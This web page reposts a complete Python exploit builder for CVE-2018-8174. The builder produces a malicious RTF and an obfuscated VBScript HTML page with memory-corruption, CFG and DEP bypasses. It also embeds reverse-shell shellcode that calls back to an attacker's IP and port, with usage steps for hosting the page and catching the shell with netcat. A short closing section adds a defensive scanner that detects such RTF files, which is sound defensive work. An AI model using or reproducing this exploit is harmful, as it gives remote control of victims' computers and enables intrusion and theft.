CVE-2018-8174 EXP 0day python
Date: 2022-06-10
This article introduces CVE-2018-8174 EXP 0day python, covering its usage example, application tips, a summary of the basic points and things to note; it has some reference value for readers who need it.
```text
usage: CVE-2018-8174.py [-h] -u URL -o OUTPUT [-i IP] [-p PORT]

Exploit for CVE-2018-8174

optional arguments:
  -h, --help                  show this help message and exit
  -u URL, --url URL           exp url
  -o OUTPUT, --output OUTPUT  Output exploit rtf
  -i IP, --ip IP              ip for netcat
  -p PORT, --port PORT        port for netcat
```
eg:
- python CVE-2018-8174.py -u http://1.1.1.1/exploit.html -o exp.rtf -i 2.2.2.2 -p 4444
- put exploit.html on your server (1.1.1.1)
- netcat listen on [any] 4444 (2.2.2.2)
enjoy it !
POC:
```python
import argparse
import struct

SampleRTF = R"""{rtf1ansiansicpg1252deff0deflang1033{fonttbl{f0fnilfcharset0 Calibri;}}
{*generator Msftedit 5.41.21.2510;}viewkind4uc1pardsa200sl276slmult1lang9f0fs22{objectobjautlinkobjupdatersltpictobjw4321objh4321{*objclass htmlfile}{*objdata 0105000002000000090000004f4c45324c696e6b000000000000000000000a0000
d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff0900060000000000000000000000010000000100000000000000001000000200000001000000feffffff0000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
fffffffffffffffffdfffffffefffffffefffffffeffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffff52006f006f007400200045006e00740072007900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000016000500ffffffffffffffff020000000003000000000000c000000000000046000000000000000000000000903b
beae04f2d30103000000000200000000000001004f006c00650000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a000200ffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000
000000000000000000000000f20000000000000003004f0062006a0049006e0066006f00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000120002010100000003000000ffffffff0000000000000000000000000000000000000000000000000000
0000000000000000000004000000060000000000000003004c0069006e006b0049006e0066006f000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000014000200ffffffffffffffffffffffff000000000000000000000000000000000000000000000000
000000000000000000000000050000008100000000000000010000000200000003000000fefffffffeffffff0600000007000000feffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff010000020900000001000000000000002a0000000403000000000000c0000000000000460200000021000c0000005f31353838343937393534000000000080000000e0c9ea79f9bace118c8200aa004ba90b68000000
UNICODE_URL
000000795881f43b1d7f48af2c825dc485276300000000a5ab0000ffffffff20693325f903cf118fd000aa00686f1300000000ffffffff0000
000000000000e05dd6ab04f2d30100000000000000000000000000000000000000000000100203000400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002700
NORMAL_URL
0000bbbbcccc2700
UNICODE_URL
0000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000001050000050000000d0000004d45544146494c45504943540000000000000000005e0000000800000000000000
0100090000032b00000000000500000000000400000003010800050000000b0200000000050000000c0200000000030000001e00050000000d0200000000050000000d0200000000040000002701ffff030000000000}
}par
}
"""

SampleHTML = R"""
<!doctype html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="x-ua-compatible" content="IE=10">
<meta http-equiv="Expires" content="0">
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Cache-control" content="no-cache">
<meta http-equiv="Cache" content="no-cache">
</head>
<body>
<script language="vbscript">
Dim lIIl
Dim IIIlI(6),IllII(6)
Dim IllI
Dim IIllI(40)
Dim lIlIIl,lIIIll
Dim IlII
Dim llll,IIIIl
Dim llllIl,IlIIII
Dim NtContinueAddr,VirtualProtectAddr
IlII=195948557
lIlIIl=Unescape("%u0001%u0880%u0001%u0000%u0000%u0000%u0000%u0000%uffff%u7fff%u0000%u0000")
lIIIll=Unescape("%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000")
IllI=195890093
Function IIIII(Domain)
lIlII=0
IllllI=0
IIlIIl=0
Id=CLng(Rnd*1000000)
lIlII=CLng((&h27d+8231-&H225b)*Rnd)Mod (&h137d+443-&H152f)+(&h1c17+131-&H1c99)
If(Id+lIlII)Mod (&h5c0+6421-&H1ed3)=(&h10ba+5264-&H254a) Then
lIlII=lIlII-(&h86d+6447-&H219b)
End If
IllllI=CLng((&h2bd+6137-&H1a6d)*Rnd)Mod (&h769+4593-&H1940)+(&h1a08+2222-&H2255)
IIlIIl=CLng((&h14e6+1728-&H1b5d)*Rnd)Mod (&hfa3+1513-&H1572)+(&h221c+947-&H256e)
IIIII=Domain &"?" &Chr(IllllI) &"=" &Id &"&" &Chr(IIlIIl) &"=" &lIlII
End Function
Function lIIII(ByVal lIlIl)
IIll=""
For index=0 To Len(lIlIl)-1
IIll=IIll &lIlI(Asc(Mid(lIlIl,index+1,1)),2)
Next
IIll=IIll &"00"
If Len(IIll)/(&h15c6+3068-&H21c0) Mod (&h1264+2141-&H1abf)=(&hc93+6054-&H2438) Then
IIll=IIll &"00"
End If
For IIIl=(&h1a1a+3208-&H26a2) To Len(IIll)/(&h1b47+331-&H1c8e)-(&h14b2+4131-&H24d4)
lIIIlI=Mid(IIll,IIIl*(&h576+1268-&Ha66)+(&ha64+6316-&H230f),(&ha49+1388-&Hfb3))
lIlIll=Mid(IIll,IIIl*(&hf82+3732-&H1e12)+(&h210+2720-&Hcaf)+(&h4fa+5370-&H19f2),(&hf82+5508-&H2504))
lIIII=lIIII &"%u" &lIlIll &lIIIlI
Next
End Function
Function lIlI(ByVal Number,ByVal Length)
IIII=Hex(Number)
If Len(IIII)<Length Then
IIII=String(Length-Len(IIII),"0") &IIII 'pad allign with zeros
Else
IIII=Right(IIII,Length)
End If
lIlI=IIII
End Function
Function GetUint32(lIII)
Dim value
llll.mem(IlII+8)=lIII+4
llll.mem(IlII)=8 'type string
value=llll.P0123456789
llll.mem(IlII)=2
GetUint32=value
End Function
Function IllIIl(lIII)
IllIIl=GetUint32(lIII) And (131071-65536)
End Function
Function lllII(lIII)
lllII=GetUint32(lIII) And (&h17eb+1312-&H1c0c)
End Function
Sub llllll
End Sub
Function GetMemValue
llll.mem(IlII)=(&h713+3616-&H1530)
GetMemValue=llll.mem(IlII+(&h169c+712-&H195c))
End Function
Sub SetMemValue(ByRef IlIIIl)
llll.mem(IlII+(&h715+3507-&H14c0))=IlIIIl
End Sub
Function LeakVBAddr
On Error Resume Next
Dim lllll
lllll=llllll
lllll=null
SetMemValue lllll
LeakVBAddr=GetMemValue()
End Function
Function GetBaseByDOSmodeSearch(IllIll)
Dim llIl
llIl=IllIll And &hffff0000
Do While GetUint32(llIl+(&h748+4239-&H176f))<>544106784 Or GetUint32(llIl+(&ha2a+7373-&H268b))<>542330692
llIl=llIl-65536
Loop
GetBaseByDOSmodeSearch=llIl
End Function
Function StrCompWrapper(lIII,llIlIl)
Dim lIIlI,IIIl
lIIlI=""
For IIIl=(&ha2a+726-&Hd00) To Len(llIlIl)-(&h2e1+5461-&H1835)
lIIlI=lIIlI &Chr(lllII(lIII+IIIl))
Next
StrCompWrapper=StrComp(UCase(lIIlI),UCase(llIlIl))
End Function
Function GetBaseFromImport(base_address,name_input)
Dim import_rva,nt_header,descriptor,import_dir
Dim IIIIII
nt_header=GetUint32(base_address+(&h3c))
import_rva=GetUint32(base_address+nt_header+&h80)
import_dir=base_address+import_rva
descriptor=0
Do While True
Dim Name
Name=GetUint32(import_dir+descriptor*(&h14)+&hc)
If Name=0 Then
GetBaseFromImport=&hBAAD0000
Exit Function
Else
If StrCompWrapper(base_address+Name,name_input)=0 Then
Exit Do
End If
End If
descriptor=descriptor+1
Loop
IIIIII=GetUint32(import_dir+descriptor*(&h14)+&h10)
GetBaseFromImport=GetBaseByDOSmodeSearch(GetUint32(base_address+IIIIII))
End Function
Function GetProcAddr(dll_base,name)
Dim p,export_dir,index
Dim function_rvas,function_names,function_ordin
Dim Illlll
p=GetUint32(dll_base+&h3c)
p=GetUint32(dll_base+p+&h78)
export_dir=dll_base+p
function_rvas=dll_base+GetUint32(export_dir+&h1c)
function_names=dll_base+GetUint32(export_dir+&h20)
function_ordin=dll_base+GetUint32(export_dir+&h24)
index=0
Do While True
Dim lllI
lllI=GetUint32(function_names+index*4)
If StrCompWrapper(dll_base+lllI,name)=0 Then
Exit Do
End If
index=index+1
Loop
Illlll=IllIIl(function_ordin+index*2)
p=GetUint32(function_rvas+Illlll*4)
GetProcAddr=dll_base+p
End Function
Function GetShellcode()
IIlI=Unescape("%u0000%u0000%u0000%u0000") &Unescape("REPLACE_SHELLCODE_HERE" &lIIII(IIIII("")))
IIlI=IIlI & String((&h80000-LenB(IIlI))/2,Unescape("%u4141"))
GetShellcode=IIlI
End Function
Function EscapeAddress(ByVal value)
Dim High,Low
High=lIlI((value And &hffff0000)/&h10000,4)
Low=lIlI(value And &hffff,4)
EscapeAddress=Unescape("%u" &Low &"%u" &High)
End Function
Function lIllIl
Dim IIIl,IlllI,IIlI,IlIII,llllI,llIII,lIllI
IlllI=lIlI(NtContinueAddr,8)
IlIII=Mid(IlllI,1,2)
llllI=Mid(IlllI,3,2)
llIII=Mid(IlllI,5,2)
lIllI=Mid(IlllI,7,2)
IIlI=""
IIlI=IIlI &"%u0000%u" &lIllI &"00"
For IIIl=1 To 3
IIlI=IIlI &"%u" &llllI &llIII
IIlI=IIlI &"%u" &lIllI &IlIII
Next
IIlI=IIlI &"%u" &llllI &llIII
IIlI=IIlI &"%u00" &IlIII
lIllIl=Unescape(IIlI)
End Function
Function WrapShellcodeWithNtContinueContext(ShellcodeAddrParam) 'bypass cfg
Dim IIlI
IIlI=String((100334-65536),Unescape("%u4141"))
IIlI=IIlI &EscapeAddress(ShellcodeAddrParam)
IIlI=IIlI &EscapeAddress(ShellcodeAddrParam)
IIlI=IIlI &EscapeAddress(&h3000)
IIlI=IIlI &EscapeAddress(&h40)
IIlI=IIlI &EscapeAddress(ShellcodeAddrParam-8)
IIlI=IIlI &String(6,Unescape("%u4242"))
IIlI=IIlI &lIllIl()
IIlI=IIlI &String((&h80000-LenB(IIlI))/2,Unescape("%u4141"))
WrapShellcodeWithNtContinueContext=IIlI
End Function
Function ExpandWithVirtualProtect(lIlll)
Dim IIlI
Dim lllllI
lllllI=lIlll+&h23
IIlI=""
IIlI=IIlI &EscapeAddress(lllllI)
IIlI=IIlI &String((&hb8-LenB(IIlI))/2,Unescape("%4141"))
IIlI=IIlI &EscapeAddress(VirtualProtectAddr)
IIlI=IIlI &EscapeAddress(&h1b)
IIlI=IIlI &EscapeAddress(0)
IIlI=IIlI &EscapeAddress(lIlll)
IIlI=IIlI &EscapeAddress(&h23)
IIlI=IIlI &String((&400-LenB(IIlI))/2,Unescape("%u4343"))
ExpandWithVirtualProtect=IIlI
End Function
Sub ExecuteShellcode
llll.mem(IlII)=&h4d 'DEP bypass
llll.mem(IlII+8)=0
msgbox(IlII) 'VT replaced
End Sub
Class cla1
Private Sub Class_Terminate()
Set IIIlI(IllI)=lIIl((&h1078+5473-&H25d8))
IllI=IllI+(&h14b5+2725-&H1f59)
lIIl((&h79a+3680-&H15f9))=(&h69c+1650-&Hd0d)
End Sub
End Class
Class cla2
Private Sub Class_Terminate()
Set IllII(IllI)=lIIl((&h15b+3616-&Hf7a))
IllI=IllI+(&h880+542-&Ha9d)
lIIl((&h1f75+342-&H20ca))=(&had3+3461-&H1857)
End Sub
End Class
Class IIIlIl
End Class
Class llIIl
Dim mem
Function P
End Function
Function SetProp(Value)
mem=Value
SetProp=0
End Function
End Class
Class IIIlll
Dim mem
Function P0123456789
P0123456789=LenB(mem(IlII+8))
End Function
Function SPP
End Function
End Class
Class lllIIl
Public Default Property Get P
Dim llII
P=174088534690791e-324
For IIIl=(&h7a0+4407-&H18d7) To (&h2eb+1143-&H75c)
IIIlI(IIIl)=(&h2176+711-&H243d)
Next
Set llII=New IIIlll
llII.mem=lIlIIl
For IIIl=(&h1729+3537-&H24fa) To (&h1df5+605-&H204c)
Set IIIlI(IIIl)=llII
Next
End Property
End Class
Class llllII
Public Default Property Get P
Dim llII
P=636598737289582e-328
For IIIl=(&h1063+2314-&H196d) To (&h4ac+2014-&Hc84)
IllII(IIIl)=(&h442+2598-&He68)
Next
Set llII=New IIIlll
llII.mem=lIIIll
For IIIl=(&h7eb+3652-&H162f) To (&h3e8+1657-&Ha5b)
Set IllII(IIIl)=llII
Next
End Property
End Class
Set llllIl=New lllIIl
Set IlIIII=New llllII
Sub UAF
For IIIl=(&hfe8+3822-&H1ed6) To (&h8b+8633-&H2233)
Set IIllI(IIIl)=New IIIlIl
Next
For IIIl=(&haa1+6236-&H22e9) To (&h1437+3036-&H1fed)
Set IIllI(IIIl)=New llIIl
Next
IllI=0
For IIIl=0 To 6
ReDim lIIl(1)
Set lIIl(1)=New cla1
Erase lIIl
Next
Set llll=New llIIl
IllI=0
For IIIl=0 To 6
ReDim lIIl(1)
Set lIIl(1)=New cla2
Erase lIIl
Next
Set IIIIl=New llIIl
End Sub
Sub InitObjects
llll.SetProp(llllIl)
IIIIl.SetProp(IlIIII)
IlII=IIIIl.mem
End Sub
Sub StartExploit
UAF
InitObjects
vb_adrr=LeakVBAddr()
// Alert "CScriptEntryPointObject Leak: 0x" & Hex(vb_adrr) & vbcrlf & "VirtualTable address: 0x" & Hex(GetUint32(vb_adrr))
vbs_base=GetBaseByDOSmodeSearch(GetUint32(vb_adrr))
// Alert "VBScript Base: 0x" & Hex(vbs_base)
msv_base=GetBaseFromImport(vbs_base,"msvcrt.dll")
// Alert "MSVCRT Base: 0x" & Hex(msv_base)
krb_base=GetBaseFromImport(msv_base,"kernelbase.dll")
// Alert "KernelBase Base: 0x" & Hex(krb_base)
ntd_base=GetBaseFromImport(msv_base,"ntdll.dll")
// Alert "Ntdll Base: 0x" & Hex(ntd_base)
VirtualProtectAddr=GetProcAddr(krb_base,"VirtualProtect")
// Alert "KernelBase!VirtualProtect Address 0x" & Hex(VirtualProtectAddr)
NtContinueAddr=GetProcAddr(ntd_base,"NtContinue")
// Alert "KernelBase!VirtualProtect Address 0x" & Hex(NtContinueAddr)
SetMemValue GetShellcode()
ShellcodeAddr=GetMemValue()+8
// Alert "Shellcode Address 0x" & Hex(ShellcodeAddr)
SetMemValue WrapShellcodeWithNtContinueContext(ShellcodeAddr)
lIlll=GetMemValue()+69596
SetMemValue ExpandWithVirtualProtect(lIlll)
llIIll=GetMemValue()
// Alert "Executing Shellcode"
ExecuteShellcode
End Sub
StartExploit
</script>
</body>
</html>
"""

reverseip = '1.1.1.1'
reverseport = 4444

def create_rtf_file(url,filename):
    NORMAL_URL = url.encode('hex')+"0"*(78-len(url.encode('hex')))
    UNICODE_URL = "00".join("{:02x}".format(ord(c)) for c in url)
    if len(UNICODE_URL) < 154:
        print 'UNICODE_URL len %d , need to pad ...' % len(UNICODE_URL)
        UNICODE_URL = UNICODE_URL+"0"*(154 - len(UNICODE_URL))
    res = SampleRTF.replace('NORMAL_URL',NORMAL_URL).replace('UNICODE_URL',UNICODE_URL)
    f = open(filename, 'w')
    f.write(res)
    f.close()
    print "Generated "+filename+" successfully"


def rev_shellcode(ip,port):
    ip = [int(i) for i in ip.split(".")]
    buf = ""
    buf += "xfcxe9x8ax00x00x00x5dx83xc5x0bx81xc4x70"
    buf += "xfexffxffx8dx54x24x60x52x68xb1x4ax6bxb1"
    buf += "xffxd5x8dx44x24x60xebx5cx5ex8dx78x60x57"
    buf += "x50x31xdbx53x53x68x04x00x00x08x53x53x53"
    buf += "x56x53x68x79xccx3fx86xffxd5x85xc0x74x59"
    buf += "x6ax40x80xc7x10x53x53x31xdbx53xffx37x68"
    buf += "xaex87x92x3fxffxd5x54x68x44x01x00x00xeb"
    buf += "x39x50xffx37x68xc5xd8xbdxe7xffxd5x53x53"
    buf += "x53x8bx4cx24xfcx51x53x53xffx37x68xc6xac"
    buf += "x9ax79xffxd5xe9x41x01x00x00xe8x9fxffxff"
    buf += "xffx72x75x6ex64x6cx6cx33x32x2ex65x78x65"
    buf += "x00xe8x71xffxffxffxe8xc2xffxffxffxfcxe8"
    buf += "x82x00x00x00x60x89xe5x31xc0x64x8bx50x30"
    buf += "x8bx52x0cx8bx52x14x8bx72x28x0fxb7x4ax26"
    buf += "x31xffxacx3cx61x7cx02x2cx20xc1xcfx0dx01"
    buf += "xc7xe2xf2x52x57x8bx52x10x8bx4ax3cx8bx4c"
    buf += "x11x78xe3x48x01xd1x51x8bx59x20x01xd3x8b"
    buf += "x49x18xe3x3ax49x8bx34x8bx01xd6x31xffxac"
    buf += "xc1xcfx0dx01xc7x38xe0x75xf6x03x7dxf8x3b"
    buf += "x7dx24x75xe4x58x8bx58x24x01xd3x66x8bx0c"
    buf += "x4bx8bx58x1cx01xd3x8bx04x8bx01xd0x89x44"
    buf += "x24x24x5bx5bx61x59x5ax51xffxe0x5fx5fx5a"
    buf += "x8bx12xebx8dx5dx68x33x32x00x00x68x77x73"
    buf += "x32x5fx54x68x4cx77x26x07xffxd5xb8x90x01"
    buf += "x00x00x29xc4x54x50x68x29x80x6bx00xffxd5"
    buf += "x50x50x50x50x40x50x40x50x68xeax0fxdfxe0"
    buf += "xffxd5x97x6ax05x68"+struct.pack("!4B",ip[0],ip[1],ip[2],ip[3])+"x68x02x00"
    buf += struct.pack("!H",port)+"x89xe6x6ax10x56x57x68x99xa5x74x61"
    buf += "xffxd5x85xc0x74x0cxffx4ex08x75xecx68xf0"
    buf += "xb5xa2x56xffxd5x68x63x6dx64x00x89xe3x57"
    buf += "x57x57x31xf6x6ax12x59x56xe2xfdx66xc7x44"
    buf += "x24x3cx01x01x8dx44x24x10xc6x00x44x54x50"
    buf += "x56x56x56x46x56x4ex56x56x53x56x68x79xcc"
    buf += "x3fx86xffxd5x89xe0x4ex56x46xffx30x68x08"
    buf += "x87x1dx60xffxd5xbbxf0xb5xa2x56x68xa6x95"
    buf += "xbdx9dxffxd5x3cx06x7cx0ax80xfbxe0x75x05"
    buf += "xbbx47x13x72x6fx6ax00x53xffxd5"

    return buf.encode("hex")

def gen_shellcode(s):
    n = len(s)
    i = 0
    strs = ''
    if n % 4 == 2:
        s=s+'41'
    while i <n:
        strs += '%u'+s[i+2:i+4]+s[i:i+2]
        i+=4
    return strs

if __name__ == '__main__':
    parser = argparse.ArgumentParser(description="Exploit for CVE-2018-8174")
    parser.add_argument("-u", "--url", help="exp url", required=True)
    parser.add_argument('-o', "--output", help="Output exploit rtf", required=True)
    parser.add_argument('-i', "--ip", help="ip for netcat", required=False)
    parser.add_argument('-p', "--port", help="port for netcat", required=False)
    args = parser.parse_args()
    url = args.url
    filename = args.output
    create_rtf_file(url,filename)
    if args.ip and args.port:
        ip = str(args.ip)
        port = int(args.port)
        shellcode = gen_shellcode(rev_shellcode(ip,port))
    else:
        shellcode = gen_shellcode(rev_shellcode(reverseip,reverseport))
    res = SampleHTML.replace('REPLACE_SHELLCODE_HERE',shellcode)
    f = open('exploit.html', 'w')
    f.write(res)
    f.close()

    print "!!! Completed !!!"
```
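From the defender's side, the durable artifact this tool leaves behind is the RTF document. `create_rtf_file` only pastes a URL into a fixed template: a linked (`objautlink`, `objupdate`) object of class `htmlfile` whose `objdata` stream contains a URL moniker, recognisable by the CLSID bytes `e0c9ea79f9bace118c8200aa004ba90b` that sit in the template right before the `UNICODE_URL` placeholder, followed by a little-endian length and the URL in UTF-16LE. Those three things together (linked object, `htmlfile` class, URL moniker) are a usable triage signature for mail gateways and sandboxes. The script below is an added example written for this page, not part of the exploit or of any project; it decodes the `objdata` hex, checks for the control words and the moniker CLSID, and recovers the URL so that the document can be quarantined and the host it points at can be investigated. It assumes the RTF still has its backslash control words intact (the listing on this page has lost its backslashes to the site's formatting), and the `build_sample_rtf` helper and the `http://example.invalid/...` URL are constructed placeholders for the example.

```python
import re
import struct
from binascii import unhexlify

# CLSID of the URL Moniker, {79EAC9E0-BAF9-11CE-8C82-00AA004BA90B}, as it is
# serialized on disk (little-endian fields). The same 16 bytes appear in the
# RTF template above immediately before the UNICODE_URL placeholder.
URL_MONIKER_CLSID = unhexlify("e0c9ea79f9bace118c8200aa004ba90b")

# Hex payload that follows a \objdata control word (whitespace may be interleaved).
OBJDATA_RE = re.compile(r"\\objdata\s*([0-9a-fA-F\s]+)")


def extract_objdata_blobs(rtf):
    """Decode every \\objdata hex payload in the RTF text into bytes."""
    blobs = []
    for match in OBJDATA_RE.finditer(rtf):
        hexdata = re.sub(r"\s+", "", match.group(1))
        if len(hexdata) % 2:
            hexdata = hexdata[:-1]  # tolerate a dangling nibble from a truncated file
        blobs.append(unhexlify(hexdata))
    return blobs


def urls_from_moniker(blob):
    """Return every URL carried by a URL moniker inside an OLE object blob.

    MS-OLEDS serializes a URLMoniker as CLSID (16 bytes), Length (4 bytes,
    little-endian), then the URL in UTF-16LE ending in a NUL pair.
    """
    urls = []
    pos = blob.find(URL_MONIKER_CLSID)
    while pos != -1:
        start = pos + len(URL_MONIKER_CLSID)
        if start + 4 > len(blob):
            break
        (length,) = struct.unpack_from("<I", blob, start)
        raw = blob[start + 4:start + 4 + length]
        end = 0
        while end + 1 < len(raw) and raw[end:end + 2] != b"\x00\x00":
            end += 2  # stay on UTF-16 code-unit boundaries
        urls.append(raw[:end].decode("utf-16-le", errors="replace"))
        pos = blob.find(URL_MONIKER_CLSID, start)
    return urls


def scan_rtf(rtf):
    """Triage an RTF document for the linked-htmlfile pattern used by this exploit."""
    indicators = []
    if re.search(r"\\objautlink", rtf):
        indicators.append("objautlink (linked, not embedded, object)")
    if re.search(r"\\objupdate", rtf):
        indicators.append("objupdate (link is refreshed automatically on open)")
    if re.search(r"\\\*\\objclass\s+htmlfile", rtf, re.IGNORECASE):
        indicators.append("objclass htmlfile (MSHTML renders the linked resource)")
    urls = []
    for blob in extract_objdata_blobs(rtf):
        if URL_MONIKER_CLSID in blob:
            indicators.append("URL moniker CLSID inside objdata")
        urls.extend(urls_from_moniker(blob))
    # A linked object alone is legitimate; require the full pattern plus a URL.
    return {"indicators": indicators, "urls": urls,
            "suspicious": bool(urls) and len(indicators) >= 3}


def build_sample_rtf(url):
    """Constructed sample (not the page's document): a minimal RTF with a linked
    htmlfile object whose objdata holds a URL moniker for `url`. Only the moniker
    part of the OLE stream is reproduced, which is all the scanner needs."""
    url_utf16 = url.encode("utf-16-le") + b"\x00\x00"
    blob = (b"\x00" * 16 + URL_MONIKER_CLSID
            + struct.pack("<I", len(url_utf16)) + url_utf16)
    return (r"{\rtf1\ansi{\object\objautlink\objupdate{\*\objclass htmlfile}"
            r"{\*\objdata " + blob.hex() + "}}}")


if __name__ == "__main__":
    report = scan_rtf(build_sample_rtf("http://example.invalid/exploit.html"))
    for line in report["indicators"]:
        print("indicator:", line)
    print("urls:", report["urls"], "suspicious:", report["suspicious"])
```

On a real file, call `scan_rtf(open(path, encoding="latin-1").read())`; the `suspicious` flag needs both a recovered URL and the linking control words, so an ordinary embedded (non-linked) OLE object does not trip it, while the recovered URL gives the blocklist entry and the network-log pivot.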